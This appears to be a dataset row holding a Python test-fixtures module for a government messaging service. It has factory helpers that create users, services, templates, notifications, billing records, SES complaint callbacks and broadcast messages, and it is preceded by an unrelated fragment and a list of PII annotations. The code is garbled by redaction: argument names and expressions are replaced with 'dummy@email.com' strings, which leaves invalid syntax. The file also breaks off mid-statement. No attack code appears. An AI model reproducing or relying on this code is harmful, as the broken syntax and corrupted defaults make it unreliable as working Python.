configdict['kiloname'] +', ' + return outstr + str(rb) + space + configdict['bytename'] + + +",3822,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2006'], ['PERSON', 'José de Paula Eufrásio Junior'], ['PERSON', 'Yves Junqueira'], ['PERSON', 'Franklin St'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'Mbytes'], ['PERSON', 'largestonly'], ['PERSON', 'meganame'], ['PERSON', 'Mbytes'], ['LOCATION', 'stringround(mb'], ['URL', 'http://www.voidspace.org.uk/python/pathutils.html'], ['IP_ADDRESS', '\n \n '], ['IP_ADDRESS', 'e::\n \n '], ['URL', 'email.com'], ['URL', 'email.com']]" +99,"import random +import uuid +from datetime import date, datetime, timedelta + +import pytest + +from app import db +from app.dao import fact_processing_time_dao +from app.dao.email_branding_dao import dao_create_email_branding +from app.dao.inbound_sms_dao import dao_create_inbound_sms +from app.dao.invited_org_user_dao import save_invited_org_user +from app.dao.invited_user_dao import save_invited_user +from app.dao.jobs_dao import dao_create_job +from app.dao.notifications_dao import dao_create_notification +from app.dao.organisation_dao import ( + dao_add_service_to_organisation, + dao_create_organisation, +) +from app.dao.permissions_dao import permission_dao +from app.dao.service_callback_api_dao import save_service_callback_api +from app.dao.service_data_retention_dao import insert_service_data_retention +from app.dao.service_inbound_api_dao import save_service_inbound_api +from app.dao.service_permissions_dao import dao_add_service_permission +from app.dao.service_sms_sender_dao import ( + dao_update_service_sms_sender, + update_existing_sms_sender_with_inbound_number, +) +from app.dao.services_dao import dao_add_user_to_service, dao_create_service +from app.dao.templates_dao import dao_create_template, dao_update_template +from app.dao.users_dao import save_model_user +from 
app.models import ( + EMAIL_TYPE, + KEY_TYPE_NORMAL, + LETTER_TYPE, + MOBILE_TYPE, + SMS_TYPE, + AnnualBilling, + ApiKey, + BroadcastEvent, + BroadcastMessage, + BroadcastProvider, + BroadcastProviderMessage, + BroadcastProviderMessageNumber, + BroadcastStatusType, + Complaint, + DailySortedLetter, + Domain, + EmailBranding, + FactBilling, + FactNotificationStatus, + FactProcessingTime, + InboundNumber, + InboundSms, + InvitedOrganisationUser, + InvitedUser, + Job, + LetterBranding, + LetterRate, + Notification, + NotificationHistory, + Organisation, + Permission, + Rate, + ReturnedLetter, + Service, + ServiceCallbackApi, + ServiceContactList, + ServiceEmailReplyTo, + ServiceGuestList, + ServiceInboundApi, + ServiceLetterContact, + ServicePermission, + ServiceSmsSender, + Template, + TemplateFolder, + User, + WebauthnCredential, +) + + +def create_user( + *, + mobile_number=""+447700900986"", + dummy@email.com"", + state='active', + id_=None, + name=""Test User"" +): + data = { + 'id': id_ or uuid.uuid4(), + 'name': name, + 'email_address': email, + 'password': 'password', + 'mobile_number': mobile_number, + 'state': state + } + user = User.query.filter_by(email_address=email).first() + if not user: + user = User(**data) + save_model_user(user, validated_email_access=True) + return user + + +def create_permissions(user, service, *permissions): + permissions = [ + Permission(service_id=service.id, user_id=user.id, permission=p) + for p in permissions + ] + + permission_dao.set_user_service_permission(user, service, permissions, _commit=True) + + +def create_service( + user=None, + service_name=""Sample service"", + service_id=None, + restricted=False, + count_as_live=True, + service_permissions=None, + research_mode=False, + active=True, + email_from=None, + prefix_sms=True, + message_limit=1000, + organisation_type='central', + check_if_service_exists=False, + go_live_user=None, + go_live_at=None, + crown=True, + organisation=None, + purchase_order_number=None, + billing_contact_names=None, + billing_contact_email_addresses=None, + billing_reference=None, +): + if check_if_service_exists: + service = Service.query.filter_by(name=service_name).first() + if (not check_if_service_exists) or (check_if_service_exists and not service): + service = Service( + name=service_name, + message_limit=message_limit, + restricted=restricted, + email_from=email_from if email_from else service_name.lower().replace(' ', '.'), + created_by=user if user else create_user(dummy@email.com())), + prefix_sms=prefix_sms, + organisation_type=organisation_type, + organisation=organisation, + go_live_user=go_live_user, + go_live_at=go_live_at, + crown=crown, + purchase_order_number=purchase_order_number, + billing_contact_names=billing_contact_names, + billing_contact_email_addresses=billing_contact_email_addresses, + billing_reference=billing_reference, + ) + dao_create_service( + service, + service.created_by, + service_id, + service_permissions=service_permissions, + ) + + service.active = active + service.research_mode = research_mode + service.count_as_live = count_as_live + else: + if user and user not in service.users: + dao_add_user_to_service(service, user) + + return service + + +def create_service_with_inbound_number( + inbound_number='1234567', + *args, **kwargs +): + service = create_service(*args, **kwargs) + + sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first() + inbound = create_inbound_number(number=inbound_number, service_id=service.id) + 
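+ # link the service's default SMS sender to the inbound number created above + # (the call below stores both the sender value and the inbound_number_id on + # the existing ServiceSmsSender row, as its argument names suggest)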
update_existing_sms_sender_with_inbound_number(service_sms_sender=sms_sender, + sms_sender=inbound_number, + inbound_number_id=inbound.id) + + return service + + +def create_service_with_defined_sms_sender( + sms_sender_value='1234567', + *args, **kwargs +): + service = create_service(*args, **kwargs) + + sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first() + dao_update_service_sms_sender(service_id=service.id, + service_sms_sender_id=sms_sender.id, + is_default=True, + sms_sender=sms_sender_value) + + return service + + +def create_template( + service, + template_type=SMS_TYPE, + template_name=None, + subject='Template subject', + content='Dear Sir/Madam, Hello. Yours Truly, The Government.', + reply_to=None, + hidden=False, + archived=False, + folder=None, + postage=None, + process_type='normal', + contact_block_id=None +): + data = { + 'name': template_name or '{} Template Name'.format(template_type), + 'template_type': template_type, + 'content': content, + 'service': service, + 'created_by': service.created_by, + 'reply_to': reply_to, + 'hidden': hidden, + 'folder': folder, + 'process_type': process_type, + } + if template_type == LETTER_TYPE: + data[""postage""] = postage or ""second"" + if contact_block_id: + data['service_letter_contact_id'] = contact_block_id + if template_type != SMS_TYPE: + data['subject'] = subject + template = Template(**data) + dao_create_template(template) + + if archived: + template.archived = archived + dao_update_template(template) + + return template + + +def create_notification( + template=None, + job=None, + job_row_number=None, + to_field=None, + status='created', + reference=None, + created_at=None, + sent_at=None, + updated_at=None, + billable_units=1, + personalisation=None, + api_key=None, + key_type=KEY_TYPE_NORMAL, + sent_by=None, + client_reference=None, + rate_multiplier=None, + international=False, + phone_prefix=None, + scheduled_for=None, + normalised_to=None, + one_off=False, + reply_to_text=None, + created_by_id=None, + postage=None, + document_download_count=None, +): + assert job or template + if job: + template = job.template + + if created_at is None: + created_at = datetime.utcnow() + + if to_field is None: + to_field = '+447700900855' if template.template_type == SMS_TYPE else dummy@email.com' + + if status not in ('created', 'validation-failed', 'virus-scan-failed', 'pending-virus-check'): + sent_at = sent_at or datetime.utcnow() + updated_at = updated_at or datetime.utcnow() + + if not one_off and (job is None and api_key is None): + # we did not specify in test - lets create it + api_key = ApiKey.query.filter(ApiKey.service == template.service, ApiKey.key_type == key_type).first() + if not api_key: + api_key = create_api_key(template.service, key_type=key_type) + + if template.template_type == 'letter' and postage is None: + postage = 'second' + + data = { + 'id': uuid.uuid4(), + 'to': to_field, + 'job_id': job and job.id, + 'job': job, + 'service_id': template.service.id, + 'service': template.service, + 'template_id': template.id, + 'template_version': template.version, + 'status': status, + 'reference': reference, + 'created_at': created_at, + 'sent_at': sent_at, + 'billable_units': billable_units, + 'personalisation': personalisation, + 'notification_type': template.template_type, + 'api_key': api_key, + 'api_key_id': api_key and api_key.id, + 'key_type': api_key.key_type if api_key else key_type, + 'sent_by': sent_by, + 'updated_at': updated_at, + 'client_reference': client_reference, + 
'job_row_number': job_row_number, + 'rate_multiplier': rate_multiplier, + 'international': international, + 'phone_prefix': phone_prefix, + 'normalised_to': normalised_to, + 'reply_to_text': reply_to_text, + 'created_by_id': created_by_id, + 'postage': postage, + 'document_download_count': document_download_count, + } + notification = Notification(**data) + dao_create_notification(notification) + + return notification + + +def create_notification_history( + template=None, + job=None, + job_row_number=None, + status='created', + reference=None, + created_at=None, + sent_at=None, + updated_at=None, + billable_units=1, + api_key=None, + key_type=KEY_TYPE_NORMAL, + sent_by=None, + client_reference=None, + rate_multiplier=None, + international=False, + phone_prefix=None, + created_by_id=None, + postage=None, + id=None +): + assert job or template + if job: + template = job.template + + if created_at is None: + created_at = datetime.utcnow() + + if status != 'created': + sent_at = sent_at or datetime.utcnow() + updated_at = updated_at or datetime.utcnow() + + if template.template_type == 'letter' and postage is None: + postage = 'second' + + data = { + 'id': id or uuid.uuid4(), + 'job_id': job and job.id, + 'job': job, + 'service_id': template.service.id, + 'service': template.service, + 'template_id': template.id, + 'template_version': template.version, + 'status': status, + 'reference': reference, + 'created_at': created_at, + 'sent_at': sent_at, + 'billable_units': billable_units, + 'notification_type': template.template_type, + 'api_key': api_key, + 'api_key_id': api_key and api_key.id, + 'key_type': api_key.key_type if api_key else key_type, + 'sent_by': sent_by, + 'updated_at': updated_at, + 'client_reference': client_reference, + 'job_row_number': job_row_number, + 'rate_multiplier': rate_multiplier, + 'international': international, + 'phone_prefix': phone_prefix, + 'created_by_id': created_by_id, + 'postage': postage + } + notification_history = NotificationHistory(**data) + db.session.add(notification_history) + db.session.commit() + + return notification_history + + +def create_job( + template, + notification_count=1, + created_at=None, + job_status='pending', + scheduled_for=None, + processing_started=None, + processing_finished=None, + original_file_name='some.csv', + archived=False, + contact_list_id=None, +): + data = { + 'id': uuid.uuid4(), + 'service_id': template.service_id, + 'service': template.service, + 'template_id': template.id, + 'template_version': template.version, + 'original_file_name': original_file_name, + 'notification_count': notification_count, + 'created_at': created_at or datetime.utcnow(), + 'created_by': template.created_by, + 'job_status': job_status, + 'scheduled_for': scheduled_for, + 'processing_started': processing_started, + 'processing_finished': processing_finished, + 'archived': archived, + 'contact_list_id': contact_list_id, + } + job = Job(**data) + dao_create_job(job) + return job + + +def create_service_permission(service_id, permission=EMAIL_TYPE): + dao_add_service_permission( + service_id if service_id else create_service().id, permission) + + service_permissions = ServicePermission.query.all() + + return service_permissions + + +def create_inbound_sms( + service, + notify_number=None, + user_number='447700900111', + provider_date=None, + provider_reference=None, + content='Hello', + provider=""mmg"", + created_at=None +): + if not service.inbound_number: + create_inbound_number( + # create random inbound number + notify_number or 
'07{:09}'.format(random.randint(0, 1e9 - 1)), + provider=provider, + service_id=service.id + ) + + inbound = InboundSms( + service=service, + created_at=created_at or datetime.utcnow(), + notify_number=service.get_inbound_number(), + user_number=user_number, + provider_date=provider_date or datetime.utcnow(), + provider_reference=provider_reference or 'foo', + content=content, + provider=provider + ) + dao_create_inbound_sms(inbound) + return inbound + + +def create_service_inbound_api( + service, + url=""https://something.com"", + bearer_token=""some_super_secret"", +): + service_inbound_api = ServiceInboundApi(service_id=service.id, + url=url, + bearer_token=bearer_token, + updated_by_id=service.users[0].id + ) + save_service_inbound_api(service_inbound_api) + return service_inbound_api + + +def create_service_callback_api( + service, + url=""https://something.com"", + bearer_token=""some_super_secret"", + callback_type=""delivery_status"" +): + service_callback_api = ServiceCallbackApi(service_id=service.id, + url=url, + bearer_token=bearer_token, + updated_by_id=service.users[0].id, + callback_type=callback_type + ) + save_service_callback_api(service_callback_api) + return service_callback_api + + +def create_email_branding(colour='blue', logo='test_x2.png', name='test_org_1', text='DisplayName'): + data = { + 'colour': colour, + 'logo': logo, + 'name': name, + 'text': text, + } + email_branding = EmailBranding(**data) + dao_create_email_branding(email_branding) + + return email_branding + + +def create_rate(start_date, value, notification_type): + rate = Rate( + id=uuid.uuid4(), + valid_from=start_date, + rate=value, + notification_type=notification_type + ) + db.session.add(rate) + db.session.commit() + return rate + + +def create_letter_rate(start_date=None, end_date=None, crown=True, sheet_count=1, rate=0.33, post_class='second'): + if start_date is None: + start_date = datetime(2016, 1, 1) + rate = LetterRate( + id=uuid.uuid4(), + start_date=start_date, + end_date=end_date, + crown=crown, + sheet_count=sheet_count, + rate=rate, + post_class=post_class + ) + db.session.add(rate) + db.session.commit() + return rate + + +def create_api_key(service, key_type=KEY_TYPE_NORMAL, key_name=None): + id_ = uuid.uuid4() + + name = key_name if key_name else '{} api key {}'.format(key_type, id_) + + api_key = ApiKey( + service=service, + name=name, + created_by=service.created_by, + key_type=key_type, + id=id_, + secret=uuid.uuid4() + ) + db.session.add(api_key) + db.session.commit() + return api_key + + +def create_inbound_number(number, provider='mmg', active=True, service_id=None): + inbound_number = InboundNumber( + id=uuid.uuid4(), + number=number, + provider=provider, + active=active, + service_id=service_id + ) + db.session.add(inbound_number) + db.session.commit() + return inbound_number + + +def create_reply_to_email( + service, + email_address, + is_default=True, + archived=False +): + data = { + 'service': service, + 'email_address': email_address, + 'is_default': is_default, + 'archived': archived, + } + reply_to = ServiceEmailReplyTo(**data) + + db.session.add(reply_to) + db.session.commit() + + return reply_to + + +def create_service_sms_sender( + service, + sms_sender, + is_default=True, + inbound_number_id=None, + archived=False +): + data = { + 'service_id': service.id, + 'sms_sender': sms_sender, + 'is_default': is_default, + 'inbound_number_id': inbound_number_id, + 'archived': archived, + } + service_sms_sender = ServiceSmsSender(**data) + + 
db.session.add(service_sms_sender) + db.session.commit() + + return service_sms_sender + + +def create_letter_contact( + service, + contact_block, + is_default=True, + archived=False +): + data = { + 'service': service, + 'contact_block': contact_block, + 'is_default': is_default, + 'archived': archived, + } + letter_content = ServiceLetterContact(**data) + + db.session.add(letter_content) + db.session.commit() + + return letter_content + + +def create_annual_billing( + service_id, free_sms_fragment_limit, financial_year_start +): + annual_billing = AnnualBilling( + service_id=service_id, + free_sms_fragment_limit=free_sms_fragment_limit, + financial_year_start=financial_year_start + ) + db.session.add(annual_billing) + db.session.commit() + + return annual_billing + + +def create_domain(domain, organisation_id): + + domain = Domain(domain=domain, organisation_id=organisation_id) + + db.session.add(domain) + db.session.commit() + + return domain + + +def create_organisation( + name='test_org_1', + active=True, + organisation_type=None, + domains=None, + organisation_id=None, + purchase_order_number=None, + billing_contact_names=None, + billing_contact_email_addresses=None, + billing_reference=None, +): + data = { + 'id': organisation_id, + 'name': name, + 'active': active, + 'organisation_type': organisation_type, + 'purchase_order_number': purchase_order_number, + 'billing_contact_names': billing_contact_names, + 'billing_contact_email_addresses': billing_contact_email_addresses, + 'billing_reference': billing_reference, + } + organisation = Organisation(**data) + dao_create_organisation(organisation) + + for domain in domains or []: + create_domain(domain, organisation.id) + + return organisation + + +def create_invited_org_user(organisation, invited_by, dummy@email.com'): + invited_org_user = InvitedOrganisationUser( + email_address=email_address, + invited_by=invited_by, + organisation=organisation, + ) + save_invited_org_user(invited_org_user) + return invited_org_user + + +def create_daily_sorted_letter(billing_day=None, + file_name=""Notify-20180118123.rs.txt"", + unsorted_count=0, + sorted_count=0): + daily_sorted_letter = DailySortedLetter( + billing_day=billing_day or date(2018, 1, 18), + file_name=file_name, + unsorted_count=unsorted_count, + sorted_count=sorted_count + ) + + db.session.add(daily_sorted_letter) + db.session.commit() + + return daily_sorted_letter + + +def create_ft_billing(bst_date, + template, + *, + provider='test', + rate_multiplier=1, + international=False, + rate=0, + billable_unit=1, + notifications_sent=1, + postage='none' + ): + data = FactBilling(bst_date=bst_date, + service_id=template.service_id, + template_id=template.id, + notification_type=template.template_type, + provider=provider, + rate_multiplier=rate_multiplier, + international=international, + rate=rate, + billable_units=billable_unit, + notifications_sent=notifications_sent, + postage=postage) + db.session.add(data) + db.session.commit() + return data + + +def create_ft_notification_status( + bst_date, + notification_type='sms', + service=None, + template=None, + job=None, + key_type='normal', + notification_status='delivered', + count=1 +): + if job: + template = job.template + if template: + service = template.service + notification_type = template.template_type + else: + if not service: + service = create_service() + template = create_template(service=service, template_type=notification_type) + + data = FactNotificationStatus( + bst_date=bst_date, + template_id=template.id, + 
service_id=service.id, + job_id=job.id if job else uuid.UUID(int=0), + notification_type=notification_type, + key_type=key_type, + notification_status=notification_status, + notification_count=count + ) + db.session.add(data) + db.session.commit() + return data + + +def create_process_time(bst_date='2021-03-01', messages_total=35, messages_within_10_secs=34): + data = FactProcessingTime( + bst_date=bst_date, + messages_total=messages_total, + messages_within_10_secs=messages_within_10_secs + ) + fact_processing_time_dao.insert_update_processing_time(data) + + +def create_service_guest_list(service, email_address=None, mobile_number=None): + if email_address: + guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, email_address) + elif mobile_number: + guest_list_user = ServiceGuestList.from_string(service.id, MOBILE_TYPE, mobile_number) + else: + guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, dummy@email.com') + + db.session.add(guest_list_user) + db.session.commit() + return guest_list_user + + +def create_complaint(service=None, + notification=None, + created_at=None): + if not service: + service = create_service() + if not notification: + template = create_template(service=service, template_type='email') + notification = create_notification(template=template) + + complaint = Complaint(notification_id=notification.id, + service_id=service.id, + ses_feedback_id=str(uuid.uuid4()), + complaint_type='abuse', + complaint_date=datetime.utcnow(), + created_at=created_at if created_at else datetime.now() + ) + db.session.add(complaint) + db.session.commit() + return complaint + + +def ses_complaint_callback_malformed_message_id(): + return { + 'Signature': 'bb', + 'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY', + 'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com', + 'TopicArn': 'arn:ses_notifications', 'Type': 'Notification', + 'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None, + 'Message': '{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""badMessageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa + 'SigningCertUrl': 'https://sns.pem' + } + + +def ses_complaint_callback_with_missing_complaint_type(): + """""" + https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object + """""" + return { + 'Signature': 'bb', + 'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY', + 'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com', + 'TopicArn': 'arn:ses_notifications', 'Type': 'Notification', + 'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None, + 'Message': '{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa + 'SigningCertUrl': 'https://sns.pem' + } + + +def 
ses_complaint_callback(): + """""" + https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object + """""" + return { + 'Signature': 'bb', + 'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY', + 'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com', + 'TopicArn': 'arn:ses_notifications', 'Type': 'Notification', + 'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None, + 'Message': '{""notificationType"":""Complaint"",""complaint"":{""complaintFeedbackType"": ""abuse"", ""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\""Some Service\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}', # noqa + 'SigningCertUrl': 'https://sns.pem' + } + + +def ses_notification_callback(): + return '{\n ""Type"" : ""Notification"",\n ""MessageId"" : ""ref1"",' \ + '\n ""TopicArn"" : ""arn:aws:sns:eu-west-1:123456789012:testing"",' \ + '\n ""Message"" : ""{\\""notificationType\\"":\\""Delivery\\"",' \ + '\\""mail\\"":{\\""timestamp\\"":\\""2016-03-14T12:35:25.909Z\\"",' \ + '\\""source\\"":dummy@email.com"",' \ + '\\""sourceArn\\"":\\""arn:aws:ses:eu-west-1:123456789012:identity/testing-notify\\"",' \ + '\\""sendingAccountId\\"":\\""123456789012\\"",' \ + '\\""messageId\\"":\\""ref1\\"",' \ + '\\""destination\\"":dummy@email.com""]},' \ + '\\""delivery\\"":{\\""timestamp\\"":\\""2016-03-14T12:35:26.567Z\\"",' \ + '\\""processingTimeMillis\\"":658,' \ + '\\""recipients\\"":dummy@email.com""],' \ + '\\""smtpResponse\\"":\\""250 2.0.0 OK 1457958926 uo5si26480932wjc.221 - gsmtp\\"",' \ + '\\""reportingMTA\\"":\\""a6-238.smtp-out.eu-west-1.amazonses.com\\""}}"",' \ + '\n ""Timestamp"" : ""2016-03-14T12:35:26.665Z"",\n ""SignatureVersion"" : ""1"",' \ + '\n ""Signature"" : ""X8d7eTAOZ6wlnrdVVPYanrAlsX0SMPfOzhoTEBnQqYkrNWTqQY91C0f3bxtPdUhUt' \ + 'PI:KEY' \ + 'PI:KEY' \ + 'PI:KEY"",' \ + '\n ""SigningCertURL"" : ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750' \ + 'dd426d95ee9390147a5624348ee.pem"",' \ + '\n ""UnsubscribeURL"" : ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S' \ + 'PI:KEY""\n}' + + +def create_service_data_retention( + service, + notification_type='sms', + days_of_retention=3 +): + data_retention = insert_service_data_retention( + service_id=service.id, + notification_type=notification_type, + days_of_retention=days_of_retention + ) + return data_retention + + +def create_invited_user(service=None, + to_email_address=None): + + if service is None: + service = create_service() + if to_email_address is None: + to_email_address = dummy@email.com' + + from_user = service.users[0] + + data = { + 'service': service, + 'email_address': to_email_address, + 'from_user': from_user, + 'permissions': 'send_messages,manage_service,manage_api_keys', + 'folder_permissions': [str(uuid.uuid4()), str(uuid.uuid4())] + } + invited_user = InvitedUser(**data) + save_invited_user(invited_user) + return invited_user + + +def create_template_folder(service, name='foo', parent=None): + tf = TemplateFolder(name=name, service=service, parent=parent) + db.session.add(tf) + db.session.commit() + return tf + + +def create_letter_branding(name='HM Government', filename='hm-government'): + test_domain_branding = LetterBranding(name=name, + 
filename=filename, + ) + db.session.add(test_domain_branding) + db.session.commit() + return test_domain_branding + + +def set_up_usage_data(start_date): + year = int(start_date.strftime('%Y')) + one_week_earlier = start_date - timedelta(days=7) + two_days_later = start_date + timedelta(days=2) + one_week_later = start_date + timedelta(days=7) + one_month_later = start_date + timedelta(days=31) + + # service with sms and letters: + service_1_sms_and_letter = create_service( + service_name='a - with sms and letter', + purchase_order_number=""service purchase order number"", + billing_contact_names=""service billing contact names"", + dummy@email.com dummy@email.com"", + billing_reference=""service billing reference"" + ) + letter_template_1 = create_template(service=service_1_sms_and_letter, template_type='letter') + sms_template_1 = create_template(service=service_1_sms_and_letter, template_type='sms') + create_annual_billing( + service_id=service_1_sms_and_letter.id, free_sms_fragment_limit=10, financial_year_start=year + ) + org_1 = create_organisation( + name=""Org for {}"".format(service_1_sms_and_letter.name), + purchase_order_number=""org1 purchase order number"", + billing_contact_names=""org1 billing contact names"", + dummy@email.com dummy@email.com"", + billing_reference=""org1 billing reference"" + ) + dao_add_service_to_organisation( + service=service_1_sms_and_letter, + organisation_id=org_1.id + ) + + create_ft_billing(bst_date=one_week_earlier, template=sms_template_1, billable_unit=2, rate=0.11) + create_ft_billing(bst_date=start_date, template=sms_template_1, billable_unit=2, rate=0.11) + create_ft_billing(bst_date=two_days_later, template=sms_template_1, billable_unit=1, rate=0.11) + + create_ft_billing(bst_date=one_week_later, template=letter_template_1, + notifications_sent=2, billable_unit=1, rate=.35, postage='first') + create_ft_billing(bst_date=one_month_later, template=letter_template_1, + notifications_sent=4, billable_unit=2, rate=.45, postage='second') + create_ft_billing(bst_date=one_week_later, template=letter_template_1, + notifications_sent=2, billable_unit=2, rate=.45, postage='second') + + # service with emails only: + service_with_emails = create_service(service_name='b - emails') + email_template = create_template(service=service_with_emails, template_type='email') + org_2 = create_organisation( + name='Org for {}'.format(service_with_emails.name), + ) + dao_add_service_to_organisation(service=service_with_emails, organisation_id=org_2.id) + + create_ft_billing(bst_date=start_date, template=email_template, notifications_sent=10) + + # service with letters: + service_with_letters = create_service(service_name='c - letters only') + letter_template_3 = create_template(service=service_with_letters, template_type='letter') + org_for_service_with_letters = create_organisation( + name=""Org for {}"".format(service_with_letters.name), + purchase_order_number=""org3 purchase order number"", + billing_contact_names=""org3 billing contact names"", + dummy@email.com dummy@email.com"", + billing_reference=""org3 billing reference"" + ) + dao_add_service_to_organisation(service=service_with_letters, organisation_id=org_for_service_with_letters.id) + + create_ft_billing(bst_date=start_date, template=letter_template_3, + notifications_sent=2, billable_unit=3, rate=.50, postage='first') + create_ft_billing(bst_date=one_week_later, template=letter_template_3, + notifications_sent=8, billable_unit=5, rate=.65, postage='second') + create_ft_billing(bst_date=one_month_later, 
template=letter_template_3, + notifications_sent=12, billable_unit=5, rate=.65, postage='second') + + # service with letters, without an organisation: + service_with_letters_without_org = create_service(service_name='d - service without org') + letter_template_4 = create_template(service=service_with_letters_without_org, template_type='letter') + + create_ft_billing(bst_date=two_days_later, template=letter_template_4, + notifications_sent=7, billable_unit=4, rate=1.55, postage='rest-of-world') + create_ft_billing(bst_date=two_days_later, template=letter_template_4, + notifications_sent=8, billable_unit=4, rate=1.55, postage='europe') + create_ft_billing(bst_date=two_days_later, template=letter_template_4, + notifications_sent=2, billable_unit=1, rate=.35, postage='second') + create_ft_billing(bst_date=two_days_later, template=letter_template_4, + notifications_sent=1, billable_unit=1, rate=.50, postage='first') + + # service with chargeable SMS, without an organisation + service_with_sms_without_org = create_service( + service_name='b - chargeable sms', + purchase_order_number=""sms purchase order number"", + billing_contact_names=""sms billing contact names"", + dummy@email.com dummy@email.com"", + billing_reference=""sms billing reference"" + ) + sms_template = create_template(service=service_with_sms_without_org, template_type='sms') + create_annual_billing( + service_id=service_with_sms_without_org.id, free_sms_fragment_limit=10, financial_year_start=year + ) + create_ft_billing(bst_date=one_week_earlier, template=sms_template, rate=0.11, billable_unit=12) + create_ft_billing(bst_date=two_days_later, template=sms_template, rate=0.11) + create_ft_billing(bst_date=one_week_later, template=sms_template, billable_unit=2, rate=0.11) + + # service with SMS within free allowance + service_with_sms_within_allowance = create_service( + service_name='e - sms within allowance' + ) + sms_template_2 = create_template(service=service_with_sms_within_allowance, template_type='sms') + create_annual_billing( + service_id=service_with_sms_within_allowance.id, free_sms_fragment_limit=10, financial_year_start=year + ) + create_ft_billing(bst_date=one_week_later, template=sms_template_2, billable_unit=2, rate=0.11) + + # dictionary with services and orgs to return + return { + ""org_1"": org_1, + ""service_1_sms_and_letter"": service_1_sms_and_letter, + ""org_2"": org_2, + ""service_with_emails"": service_with_emails, + ""org_for_service_with_letters"": org_for_service_with_letters, + ""service_with_letters"": service_with_letters, + ""service_with_letters_without_org"": service_with_letters_without_org, + ""service_with_sms_without_org"": service_with_sms_without_org, + ""service_with_sms_within_allowance"": service_with_sms_within_allowance, + } + + +def create_returned_letter(service=None, reported_at=None, notification_id=None): + if not service: + service = create_service(service_name='a - with sms and letter') + returned_letter = ReturnedLetter( + service_id=service.id, + reported_at=reported_at or datetime.utcnow(), + notification_id=notification_id or uuid.uuid4(), + created_at=datetime.utcnow(), + ) + + db.session.add(returned_letter) + db.session.commit() + return returned_letter + + +def create_service_contact_list( + service=None, + original_file_name='EmergencyContactList.xls', + row_count=100, + template_type='email', + created_by_id=None, + archived=False, +): + if not service: + service = create_service(service_name='service for contact list', user=create_user()) + + contact_list = 
ServiceContactList( + service_id=service.id, + original_file_name=original_file_name, + row_count=row_count, + template_type=template_type, + created_by_id=created_by_id or service.users[0].id, + created_at=datetime.utcnow(), + archived=archived, + ) + db.session.add(contact_list) + db.session.commit() + return contact_list + + +def create_broadcast_message( + template=None, + *, + service=None, # only used if template is not provided + created_by=None, + personalisation=None, + content=None, + status=BroadcastStatusType.DRAFT, + starts_at=None, + finishes_at=None, + areas=None, + stubbed=False +): + if template: + service = template.service + template_id = template.id + template_version = template.version + personalisation = personalisation or {} + content = template._as_utils_template_with_personalisation( + personalisation + ).content_with_placeholders_filled_in + elif content: + template_id = None + template_version = None + personalisation = None + content = content + else: + pytest.fail('Provide template or content') + + broadcast_message = BroadcastMessage( + service_id=service.id, + template_id=template_id, + template_version=template_version, + personalisation=personalisation, + status=status, + starts_at=starts_at, + finishes_at=finishes_at, + created_by_id=created_by.id if created_by else service.created_by_id, + areas=areas or {'areas': [], 'simple_polygons': []}, + content=content, + stubbed=stubbed + ) + db.session.add(broadcast_message) + db.session.commit() + return broadcast_message + + +def create_broadcast_event( + broadcast_message, + sent_at=None, + message_type='alert', + transmitted_content=None, + transmitted_areas=None, + transmitted_sender=None, + transmitted_starts_at=None, + transmitted_finishes_at=None, +): + b_e = BroadcastEvent( + service=broadcast_message.service, + broadcast_message=broadcast_message, + sent_at=sent_at or datetime.utcnow(), + message_type=message_type, + transmitted_content=transmitted_content or {'body': 'this is an emergency broadcast message'}, + transmitted_areas=transmitted_areas or broadcast_message.areas, + transmitted_sender=transmitted_sender or 'www.notifications.service.gov.uk', + transmitted_starts_at=transmitted_starts_at, + transmitted_finishes_at=transmitted_finishes_at or datetime.utcnow() + timedelta(hours=24), + ) + db.session.add(b_e) + db.session.commit() + return b_e + + +def create_broadcast_provider_message( + broadcast_event, + provider, + status='sending' +): + broadcast_provider_message_id = uuid.uuid4() + provider_message = BroadcastProviderMessage( + id=broadcast_provider_message_id, + broadcast_event=broadcast_event, + provider=provider, + status=status, + ) + db.session.add(provider_message) + db.session.commit() + + provider_message_number = None + if provider == 